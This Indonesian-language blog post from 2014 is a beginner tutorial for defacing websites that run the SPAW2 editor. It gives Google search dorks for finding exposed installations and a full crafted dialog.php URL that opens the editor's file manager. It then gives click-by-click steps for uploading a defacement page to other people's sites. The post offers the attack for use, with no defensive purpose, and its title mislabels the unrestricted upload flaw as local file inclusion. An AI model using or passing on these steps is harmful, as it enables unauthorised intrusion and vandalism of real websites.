Monday, April 7, 2014

Lang Sung Tulis

SPAW Editor : Local File Inclusion Vulnerability

untuk yang mau belajar diface mungkin bisa di mulai dari sini dulu.
mungkin ini cara yang paling mudah,
ok langsung aja begini caranya yang saya dapatkan dari salah satu forum.

Pertama : search dorknya di google : inurl:”spaw2/dialogs/” atau inurl:”spaw2/uploads/files/”


setelah terlihat gambar seperti di bawah, pilih salah satu link yang mau kita upload file kita.


Setelah anda search dork tadi di google
pilih salah satu web yang mau di deface ingat gx semua web bisa yah :P

dan kemudian setelah masuk kita akan melihat tampilan seperti ini.
  
 setalah anda masuk dalam webnya
anda lihat URLnya di adrees bar
Contoh URLNYA : http://contoh.com/spaw2/uploads/files/
pada bagian /spaw2/uploads/files/

diganti dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Sehingga Menjadi http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

 kemudian tekan enter
maka akan terlihat gambar seperti di bawah
pada "flash movie" ganti menjadi files.

kemudian upload file deface .html yang sudah anda persiapkan.
kemudian setelah anda selesai meng upload file deface anda
anda akan melihat file deface anda dengan nama yang tadi anda upload tadi.
trus klik 1 kali.
dan  pada sebelah kanan ada tulisan download file.
kemudian klik [download file] dan anda akan menuju ke hasil deface anda.

 

Lang Sung Tulis

About Lang Sung Tulis -

Author Description here.. Nulla sagittis convallis. Curabitur consequat. Quisque metus enim, venenatis fermentum, mollis in, porta et, nibh. Duis vulputate elit in elit. Mauris dictum libero id justo.

Subscribe to this Blog via Email :